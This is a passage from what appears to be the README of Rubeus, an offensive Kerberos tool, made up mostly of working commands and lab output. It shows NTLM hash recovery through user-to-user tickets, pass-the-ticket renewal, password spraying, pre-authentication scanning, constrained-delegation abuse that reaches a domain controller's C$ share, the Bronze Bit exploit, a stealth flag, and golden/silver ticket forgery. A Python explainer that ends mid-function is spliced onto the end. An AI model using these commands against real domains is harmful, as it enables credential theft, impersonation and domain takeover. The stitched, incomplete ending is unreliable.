EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (528) 
NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-1\r\n ResourceGroupCount : 0\r\n CredentialInfo :\r\n Version : 0\r\n EncryptionType : rc4_hmac\r\n CredentialData : *** NO KEY ***\r\n ClientName :\r\n Client Id : 19/07/2021 23:57:46\r\n Client Name : harmj0y\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : harmj0y@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : 96FA020562EE73B38D31AEEF (VALID)\r\n KDCChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : E7FDCBAF5F580DFB567DF102 (UNVALIDATED)\r\n[*] Printing argument list for use with Rubeus' 'golden' or 'silver' commands:\r\n/user:harmj0y /id:1106 /pgid:513 /logoncount:8 /badpwdcount:0 /sid:S-1-5-21-3237111427-1607930709-3979055039 /ne\r\nUsing PKINIT to request a TGT and then requesting a user-to-user service ticket to gain access to the NTLM hash\r\nstored within the PAC (manually performing the /getcredentials flag to asktgt):\r\nC:\\Rubeus\u003eRubeus.exe asktgs /u2u /asrepkey:CC9D16AB01D1BD0EF9EBD53C8AD536D9 /ticket:doIF9DCCBfCgAwIBBaED...(sni\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PDC1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building User-to-User TGS-REQ request for: 'harmj0y'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFxTCCBcGgAwIBBaEDAgEWooIE1DCCBNBhggTMMIIEyKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n RVVTLkdIT1NUUEFDSy5MT0NBTKkUMBKgAwIBAaELMAkbB2hhcm1qMHk=\r\n ServiceName : harmj0y\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : 
harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 19/07/2021 23:01:05\r\n EndTime : 20/07/2021 09:00:38\r\n RenewTill : 26/07/2021 23:00:38\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : rc4_hmac\r\n Base64(key) : Qm9zdwFIINSHAAmqaviuEw==\r\n ASREP (key) : CC9D16AB01D1BD0EF9EBD53C8AD536D9\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 19/07/2021 22:59:21\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 14/07/2021 02:07:12\r\n PasswordCanChange : 15/07/2021 02:07:12\r\n PasswordMustChange :\r\n EffectiveName : harmj0y\r\n FullName : Harm J0y\r\n LogonScript :\r\n ProfilePath :\r\n HomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 7\r\n BadPasswordCount : 0\r\n UserId : 1106\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (528) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-1\r\n ResourceGroupCount : 0\r\n CredentialInfo :\r\n Version : 0\r\n EncryptionType : rc4_hmac\r\n CredentialData :\r\n CredentialCount : 1\r\n NTLM : C69A7EA908898C23B72E65329AF7E3E8\r\n ClientName :\r\n Client Id : 19/07/2021 23:00:38\r\n Client Name : harmj0y\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : harmj0y@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_MD5\r\n Signature : ADEC4A1A7DF70D0A61047E510E778454 (VALID)\r\n KDCChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : 6CF688E02147BEEC168E0125 (UNVALIDATED)\r\nNote: The /asrepkey from the TGT retrieval must be passed to decrypt the CredentialData section where the\r\nNTLM hash is stored, but the /servicekey argument is not required here as the session key from 
the TGT is\r\nbeing used because it is a user-to-user request.\r\nRequesting a service ticket using the current logged-on session:\r\nRubeus.exe asktgs /service:LDAP/dc.ghostpack.local /nowrap\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.3.3\r\n[*] Action: Ask TGS\r\n[=] Requesting service ticket via LSA authentication package 2 using handle 0x9625072\r\n[*] base64(ticket.kirbi):\r\n doIGvDCCBrigAwIBBaEDAg(..snip..)\r\n ServiceName : LDAP/dc.ghostpack.local\r\n ServiceRealm : GHOSTPACK.LOCAL\r\n UserName : CCob (NT_PRINCIPAL)\r\n UserRealm : GHOSTPACK.LOCAL\r\n StartTime : 25/02/2025 09:08:11\r\n EndTime : 25/02/2025 18:48:39\r\n RenewTill : 03/03/2025 12:47:40\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : k2xUOHFN1Xg(...snip...)\r\nRequesting local computer account TGT via renewal. Requires local administrator access. 
If credential guard is\r\npresent, ticket use will not be possible away from the host.\r\nRubeus.exe asktgs /service:krbtgt/ghostpack.local /luid:0x3e7\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.3.3\r\n[*] Action: Ask TGS\r\n[=] Requesting service ticket via LSA authentication package 2 using handle 0x10441184\r\n[*] base64(ticket.kirbi):\r\n doIGuTCCBrWg(...snip...)IFhb3MuZGV2\r\n ServiceName : krbtgt/ghostpack.local\r\n ServiceRealm : GHOSTPACK.LOCAL\r\n UserName : DC$ (NT_PRINCIPAL)\r\n UserRealm : GHOSTPACK.LOCAL\r\n StartTime : 25/02/2025 09:18:37\r\n EndTime : 25/02/2025 11:35:10\r\n RenewTill : 02/03/2025 10:35:06\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : k2xUOHFN1Xg(...snip...)\r\nrenew\r\nThe renew action will build/parse a raw TGS-REQ/TGS-REP TGT renewal exchange using the specified\r\n/ticket:X supplied. This value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk. If a\r\n/dc is not specified, the computer's current domain controller is extracted and used as the destination for the\r\nrenewal traffic. 
The /ptt flag will \"pass-the-ticket\" and apply the resulting Kerberos credential to the current\r\nlogon session.\r\nNote that TGTs MUST be renewed before their EndTime, within the RenewTill window.\r\nC:\\Rubeus\u003eRubeus.exe renew /ticket:ticket.kirbi /ptt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Renew TGT\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ renewal for: 'TESTLAB.LOCAL\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1506 bytes\r\n[*] Received 1510 bytes\r\n[+] TGT renewal request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nThe /autorenew flag will take an existing /ticket:X .kirbi file/blob, sleep until endTime-30 minutes, auto-renew the ticket and display the refreshed ticket blob. It will continue this renewal process until the allowable\r\nrenew-till renewal window passes.\r\nC:\\Rubeus\u003eRubeus.exe renew /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip)... 
/autorenew\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.3.3\r\n[*] Action: Auto-Renew TGT\r\n[*] User : dfm.a@TESTLAB.LOCAL\r\n[*] endtime : 2/10/2019 11:44:09 PM\r\n[*] renew-till : 2/17/2019 6:44:09 PM\r\n[*] Sleeping for 263 minutes (endTime-30) before the next renewal\r\n[*] Renewing TGT for dfm.a@TESTLAB.LOCAL\r\n[*] Action: Renew TGT\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ renewal for: 'TESTLAB.LOCAL\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1506 bytes\r\n[*] Received 1510 bytes\r\n[+] TGT renewal request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...\r\nbrute\r\nThe brute action will perform a Kerberos-based password brute-forcing or password spraying attack. spray can\r\nalso be used as the action name.\r\nC:\\Rubeus\u003eRubeus.exe brute /password:Password123!! 
/noticket\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[-] Blocked/Disabled user =\u003e Guest\r\n[-] Blocked/Disabled user =\u003e DefaultAccount\r\n[-] Blocked/Disabled user =\u003e krbtgt\r\n[-] Blocked/Disabled user =\u003e disabled\r\n[+] STUPENDOUS =\u003e newuser:Password123!!\r\n[*] base64(newuser.kirbi):\r\n doIFLDCCBSigAwIBBaEDAgEWooIELDCCBChhggQkMIIEIKADAgEFoRAbDlR...(snip)...\r\npreauthscan\r\nThe preauthscan action will send AS-REQ's for all usernames passed into the /users argument to discover\r\naccounts that do not require Kerberos pre-authentication.\r\nC:\\Rubeus\u003eRubeus.exe preauthscan /users:uns.txt /domain:semperis.lab /dc:192.168.71.220\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.2.0\r\n[*] Action: Scan for accounts not requiring Kerberos Pre-Authentication\r\n[*] cclark: Pre-Auth Required\r\n[*] jjones: Pre-Auth Not Required\r\n[*] rwilliams: Pre-Auth Required\r\n[*] svc_sqlserver: Pre-Auth Required\r\n[*] pgreen: Pre-Auth Required\r\n[*] jsmith: Pre-Auth Required\r\n[*] tnahum: Pre-Auth Required\r\n[*] sfederovsky: Pre-Auth Required\r\nConstrained delegation abuse\r\nBreakdown of the constrained delegation commands:\r\nCommand Description\r\ns4u Perform S4U2self and S4U2proxy actions\r\ns4u\r\nThe s4u action is nearly identical to Kekeo's tgs::s4u functionality. If a user (or computer) account is configured\r\nfor constrained delegation (i.e. has a SPN value in its msds-allowedtodelegateto field) this action can be used to\r\nabuse access to the target SPN/server. Constrained delegation is complex. 
For more information see this post or\r\nElad Shamir's \"Wagging the Dog\" post.\r\nA TL;DR explanation is that an account with constrained delegation enabled is allowed to request tickets to itself\r\nas any user, in a process known as S4U2self. In order for an account to be allowed to do this, it has to have\r\nTrustedToAuthForDelegation enabled in its useraccountcontrol property, something that only elevated users can\r\nmodify by default. This ticket has the FORWARDABLE flag set by default. The service can then use this\r\nspecially requested ticket to request a service ticket to any service principal name (SPN) specified in the account's\r\nmsds-allowedtodelegateto field. So long story short, if you have control of an account with\r\nTrustedToAuthForDelegation set and a value in msds-allowedtodelegateto, you can pretend to be any user in\r\nthe domain to the SPNs set in the account's msds-allowedtodelegateto field.\r\nThis \"control\" can be the hash of the account ( /rc4 or /aes256 ), or an existing TGT ( /ticket:X ) for the\r\naccount with a msds-allowedtodelegateto value set. If a /user and an rc4/aes256 hash are supplied, the s4u module\r\nperforms an asktgt action first, using the returned ticket for the steps following. If a TGT /ticket:X is supplied,\r\nthat TGT is used instead.\r\nIf an account hash is supplied, the /nopac switch can be used to request the initial TGT without a PAC.\r\nUsing a KDC proxy (MS-KKDCP) to make the requests is possible using the /proxyurl:URL argument. The full\r\nURL for the KDC proxy is required, eg. https://kdcproxy.exmaple.com/kdcproxy. When used for the s4u\r\ncommand, all requests will be sent through the proxy.\r\nAn /impersonateuser:X parameter MUST be supplied to the s4u module. 
If nothing else is supplied, just the\r\nS4U2self process is executed, returning a forwardable ticket:\r\nC:\\Rubeus\u003eRubeus.exe s4u /user:patsy /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:dfm.a\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\patsy'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 230 bytes\r\n[*] Received 1377 bytes\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIE+jCCBPagAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'TESTLAB.LOCAL\\patsy'\r\n[*] Sending S4U2self request\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1437 bytes\r\n[*] Received 1574 bytes\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'dfm.a@TESTLAB.LOCAL' to 'TESTLAB.LOCAL\\patsy'\r\n[*] base64(ticket.kirbi):\r\n doIF2jCCBdagAwIBBaEDAgEWoo...(snip)...\r\nThat forwardable ticket can then be used as a /tgs:Y parameter (base64 blob or .kirbi file) to execute the\r\nS4U2proxy process. 
A valid msds-allowedtodelegateto value for the account must be supplied ( /msdsspn:X ).\r\nSay the patsy@testlab.local account looks like this:\r\nPS C:\\\u003e Get-DomainUser patsy -Properties samaccountname,msds-allowedtodelegateto | Select -Expand msds-allowedt\r\nldap/PRIMARY.testlab.local/testlab.local\r\nldap/PRIMARY\r\nldap/PRIMARY.testlab.local/TESTLAB\r\nldap/PRIMARY/TESTLAB\r\nldap/PRIMARY.testlab.local/DomainDnsZones.testlab.local\r\nldap/PRIMARY.testlab.local/ForestDnsZones.testlab.local\r\nldap/PRIMARY.testlab.local\r\nThen the S4U2proxy abuse function (using the ticket from the previous S4U2self process) would be:\r\nC:\\Rubeus\u003eRubeus.exe s4u /ticket:doIE+jCCBPagAwIBBaEDAgEWoo..(snip).. /msdsspn:\"ldap/PRIMARY.testlab.local\" /tg\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: S4U\r\n[*] Loaded a TGS for TESTLAB.LOCAL\\dfm.a@TESTLAB.LOCAL\r\n[*] Impersonating user 'dfm.a@TESTLAB.LOCAL' to target SPN 'ldap/PRIMARY.testlab.local'\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'\r\n[*] Sending S4U2proxy request\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 2641 bytes\r\n[*] Received 1829 bytes\r\n[+] S4U2proxy success!\r\n[*] base64(ticket.kirbi) for SPN 'ldap/PRIMARY.testlab.local':\r\n doIGujCCBragAwIBBaEDAgEWoo..(snip)..\r\nWhere /ticket:X is the TGT returned in the first step, and /tgs is the S4U2self ticket. 
Injecting the resulting\r\nticket (manually with Rubeus.exe ptt /ticket:X or by supplying the /ptt flag to the s4u command) will allow\r\nyou to access the ldap service on primary.testlab.local as if you are dfm.a.\r\nThe /altservice parameter takes advantage of Alberto Solino's great discovery about how the service name\r\n(sname) is not protected in the KRB-CRED file, only the server name is. This allows us to substitute in any\r\nservice name we want in the resulting KRB-CRED (.kirbi) file. One or more alternate service names can be\r\nsupplied, comma separated ( /altservice:cifs,HOST,... ).\r\nLet's expand on the previous example, forging access to the filesystem on primary.testlab.local by abusing its\r\nconstrained delegation configuration and the alternate service substitution. Let's package it all into one step as\r\nwell, performing a TGT request, S4U2self process, S4U2proxy execution, and injection of the final ticket:\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nAccess is denied.\r\nC:\\Rubeus\u003eRubeus.exe s4u /user:patsy /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:dfm.a /msdsspn:\"ldap\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\patsy'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 230 bytes\r\n[*] Received 1377 bytes\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIE+jCCBPagAwIBBaEDAgEWoo..(snip)..\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'TESTLAB.LOCAL\\patsy'\r\n[*] Sending S4U2self request\r\n[*] Connecting 
to 192.168.52.100:88\r\n[*] Sent 1437 bytes\r\n[*] Received 1574 bytes\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'dfm.a@TESTLAB.LOCAL' to 'TESTLAB.LOCAL\\patsy'\r\n[*] base64(ticket.kirbi):\r\n doIF2jCCBdagAwIBBaEDAgEWoo..(snip)..\r\n[*] Impersonating user 'dfm.a' to target SPN 'ldap/PRIMARY.testlab.local'\r\n[*] Final ticket will be for the alternate service 'cifs'\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'\r\n[*] Sending S4U2proxy request\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 2641 bytes\r\n[*] Received 1829 bytes\r\n[+] S4U2proxy success!\r\n[*] Substituting alternative service name 'cifs'\r\n[*] base64(ticket.kirbi) for SPN 'cifs/PRIMARY.testlab.local':\r\n doIGujCCBragAwIBBaEDAgEWoo..(snip)..\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nVolume in drive \\\\primary.testlab.local\\C$ has no label.\r\nVolume Serial Number is A48B-4D68\r\nDirectory of \\\\primary.testlab.local\\C$\r\n07/05/2018 12:57 PM \u003cDIR\u003e dumps\r\n03/05/2017 04:36 PM \u003cDIR\u003e inetpub\r\n08/22/2013 07:52 AM \u003cDIR\u003e PerfLogs\r\n04/15/2017 05:25 PM \u003cDIR\u003e profiles\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files (x86)\r\n10/09/2018 12:04 PM \u003cDIR\u003e Temp\r\n08/23/2018 03:52 PM \u003cDIR\u003e Users\r\n10/25/2018 01:15 PM \u003cDIR\u003e Windows\r\n 1 File(s) 9 bytes\r\n 9 Dir(s) 40,511,676,416 bytes free\r\nBy default, several differences exist between the S4U2Self and S4U2Proxy TGS-REQs generated by Rubeus and\r\ngenuine requests. To form the TGS-REQs more in line with genuine requests, the /opsec flag can be used. 
As\r\nthis flag is intended to make Rubeus traffic more stealthy, it cannot by default be used with any encryption type\r\nother than aes256 and will just throw a warning and exit if another encryption type is used. To allow for other\r\nencryption types to be used with the /opsec changes, the /force flag exists. The /opsec flag has not yet\r\nbeen implemented for cross domain S4U.\r\nThe Bronze Bit exploit (CVE-2020-17049) is implemented using the /bronzebit flag. Adding this flag will\r\nautomatically flip the forwardable flag when retrieving the S4U2Self ticket. As flipping this flag requires the\r\nservice ticket to be decrypted and re-encrypted, the long term key (service account's password hash) is required.\r\nFor this reason, if a TGT is being supplied, the service account's credentials are also required for this to work.\r\nIt is possible, in certain circumstances, to use an S4U2Self ticket to impersonate protected users in order to\r\nescalate privileges on the requesting system, as discussed here. For this purpose, the /self flag and\r\n/altservice:X argument can be used to generate a usable service ticket.\r\nTo forge an S4U2Self referral, only the trust key is required. By using the /targetdomain:X argument with the\r\n/self flag and without the /targetdc argument, Rubeus will treat the ticket supplied with /ticket:X as an\r\nS4U2Self referral and only request the final S4U2Self service ticket. 
The /altservice:X argument can also be used to\r\nrewrite the sname in the resulting ticket:\r\nC:\\Rubeus\u003eRubeus.exe s4u /self /targetdomain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /impersonateuse\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[*] Action: S4U\r\n[*] Action: S4U\r\n[*] Using domain controller: idc1.internal.zeroday.lab (192.168.71.20)\r\n[*] Requesting the cross realm 'S4U2Self' for external.admin@external.zeroday.lab from idc1.internal.zeroday.lab\r\n[*] Sending cross realm S4U2Self request\r\n[+] cross realm S4U2Self success!\r\n[*] Substituting alternative service name 'host/isql1.internal.zeroday.lab'\r\n[*] base64(ticket.kirbi):\r\n doIFETCCBQ...RheS5sYWI=\r\nTicket Forgery\r\nBreakdown of the ticket forgery commands:\r\nCommand Description\r\ngolden Forge a ticket granting ticket (TGT)\r\nsilver Forge a service ticket, can also forge TGTs\r\ndiamond Forge a diamond ticket\r\nThere are many similarities between the golden and silver commands, the reason for them being separate is\r\nto simplify the golden command. 
Service tickets can be much more complex than TGTs, with different keys and\r\nextra sections. While TGTs can be forged with the silver command, golden provides fewer potential\r\narguments, as the features not relevant to TGTs are not present.\r\nMost of the arguments for both of these commands are to set PAC fields and should be reasonably self-explanatory.\r\nThese are:\r\nArgument Description\r\n/user\r\nUsed as the user to query details for if /ldap is passed but also is used to set the\r\nEffectiveName field in the PAC and the cname field in the EncTicketPart\r\n/dc\r\nSpecifies the domain controller used for the LDAP query if /ldap is passed but also\r\nused to set the LogonServer field in the PAC\r\n/netbios Sets the LogonDomainName field in the PAC\r\n/sid Sets the LogonDomainId field in the PAC\r\n/id Sets the UserId field in the PAC (Default: 500)\r\n/displayname Sets the FullName field in the PAC\r\n/logoncount Sets the LogonCount field in the PAC (Default: 0)\r\n/badpwdcount Sets the BadPasswordCount field in the PAC (Default: 0)\r\n/uac Sets the UAC field in the PAC (Default: NORMAL_ACCOUNT)\r\n/pgid\r\nSets the PrimaryGroupId field in the PAC and is also added to the /groups field\r\n(Default: 513)\r\n/groups\r\nComma separated. Sets the Groups field in the PAC, also has the /pgid added to it.\r\nThe total is also used to calculate the GroupCount field (Default: 520,512,513,519,518)\r\n/homedir Sets the HomeDirectory field in the PAC\r\n/homedrive Sets the HomeDirectoryDrive field in the PAC\r\n/profilepath Sets the ProfilePath field in the PAC\r\n/scriptpath Sets the LogonScript field in the PAC\r\n/logofftime\r\nSets the LogoffTime field in the PAC. In local time format - Is converted to UTC\r\nautomatically\r\n/lastlogon\r\nSets the LogonTime field in the PAC. 
In local time format - Is converted to UTC\r\nautomatically (Default: starttime - 1 second)\r\n/passlastset\r\nSets the PasswordLastSet field in the PAC. In local time format - Is converted to UTC\r\nautomatically\r\n/minpassage\r\nSets the PasswordCanChange field in the PAC. This is relative to PasswordLastSet, in\r\nnumber of days, so '5' for 5 days\r\n/maxpassage\r\nSets the PasswordMustChange field in the PAC. This is relative to PasswordLastSet, in\r\nnumber of days, so '5' for 5 days\r\n/sids\r\nComma separated. Sets the ExtraSIDs field in the PAC. It is also used to calculate the\r\nExtraSIDCount field\r\n/resourcegroupsid Sets the ResourceGroupSid field in the PAC. If used, /resourcegroups is also required\r\n/resourcegroups\r\nComma separated. Sets the ResourceGroups field in the PAC. It is also used to calculate\r\nthe ResourceGroupCount field. If used, /resourcegroupsid is also required\r\nOther arguments common to both commands but to set fields outside of the PAC are:\r\nArgument Description\r\n/authtime\r\nSets the authtime field in the EncTicketPart. In local time format - Is converted to UTC\r\nautomatically (Default: now)\r\n/starttime\r\nSets the starttime field in the EncTicketPart. In local time format - Is converted to UTC\r\nautomatically (Default: now)\r\n/endtime\r\nSets the endtime field in the EncTicketPart. This is relative to starttime, in the format of\r\nmultiplier plus timerange, so for 5 days, 5d. More information on this format explained\r\nbelow (Default: 10h)\r\n/renewtill\r\nSets the renew-till field in the EncTicketPart. This is relative to starttime, in the format of\r\nmultiplier plus timerange, so for 5 days, 5d. More information on this format explained\r\nbelow (Default: 7d)\r\n/rangeend\r\nThis is for creating multiple tickets that start at different times. 
This will be the last\r\nstarttime, relative to /starttime , in the format of multiplier plus timerange, so for 5\r\ndays, 5d. More information on this format explained below\r\n/rangeinterval\r\nThis is for creating multiple tickets that start at different times. This is the interval that\r\nwill be used between each starttime, in the format of multiplier plus timerange, so for 5\r\ndays, 5d. More information on this format explained below\r\n/flags\r\nSets the ticket flags within the EncTicketPart (Default:\r\nforwardable,renewable,pre_authent and for golden also initial)\r\n/extendedupndns\r\nIncludes the new extended UpnDns (which includes the samaccountname and account\r\nSID)\r\nFor the relative times described in the tables above, the format is an integer used as a multiplier followed by a\r\nsingle character which acts as a timerange. The meaning of each supported character is shown in the table below\r\n(these are case-sensitive):\r\nCharacter Description\r\nm Minutes\r\nh Hours\r\nd Days\r\nM Months\r\ny Years\r\nThe other common feature used by both commands is LDAP information retrieval. Both golden and silver\r\nsupport retrieving information over LDAP using the /ldap flag. The /ldap flag can be used with the\r\n/creduser and /credpassword arguments to authenticate as an alternative user when retrieving this information.\r\nThe information is retrieved by sending 3 LDAP queries and mounting the SYSVOL share of a domain controller\r\n(for reading the Domain policy file) if no other information is passed. 
LDAP queries will automatically be sent\r\nover TLS and fall back to plaintext LDAP if that fails.\r\nThe first LDAP query, which will always be sent if /ldap is passed, queries for the user specified in /user , and\r\nretrieves most of the user's information required for the PAC.\r\nThe second LDAP query will be sent if /groups , /pgid , /minpassage OR /maxpassage are not given on the\r\ncommand line; any of these arguments given on the command line will avoid querying LDAP for that information.\r\nThis query retrieves the groups that the user is a member of, including the primary group, along with the domain\r\npolicy object (used to get the path to the policy file). If /minpassage or /maxpassage is not provided on the\r\ncommand line and the domain policy object is retrieved from LDAP, the SYSVOL share of a DC is mounted and\r\nthe policy file is parsed to get the MinimumPasswordAge (to set the proper value for the PasswordCanChange\r\nfield in the PAC) and the MaximumPasswordAge (to set the proper value for the PasswordMustChange field in\r\nthe PAC) values.\r\nLastly, if the /netbios argument is not given on the command line, an LDAP query for the proper netbios name\r\nof the domain is made from the Configuration container in order to set the LogonDomainName field in the PAC.\r\nIf the /ldap flag is not given on the command line and the /netbios argument also is not given, the first\r\nelement of the domain name (before the first period '.') is uppercased and used instead.\r\nThe /printcmd flag can be used to print the arguments required to generate another ticket containing the same\r\nPAC information used to generate the current ticket. 
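The relative time format from the table above (integer multiplier plus one of m, h, d, M, y, case-sensitive), the /endtime and /renewtill defaults, the /rangeend and /rangeinterval start-time series, and the PasswordCanChange / PasswordMustChange derivation from the domain policy's MinimumPasswordAge and MaximumPasswordAge, worked through as an added Python example. This is not Rubeus code and not part of the README; it assumes the policy file is INI-style with a [System Access] section holding the two ages in days (the sample text is constructed), and it treats /rangeend as an inclusive bound, which is this example's own choice rather than something the README states.

```python
# Added example (not Rubeus code): the README's relative time format and the
# PAC password-age fields derived from the domain policy file.
from datetime import datetime, timedelta
import calendar
import configparser

# Case-sensitive unit characters from the README table: m/h/d/M/y.
UNITS = {'m': 'minutes', 'h': 'hours', 'd': 'days', 'M': 'months', 'y': 'years'}


def parse_time(text):
    """Parse the dd/MM/yyyy HH:mm:ss timestamps printed in the README output."""
    return datetime.strptime(text, '%d/%m/%Y %H:%M:%S')


def parse_relative(spec):
    """Split '5d' into (5, 'd'); reject unknown units, so '5D' or '5w' is an error."""
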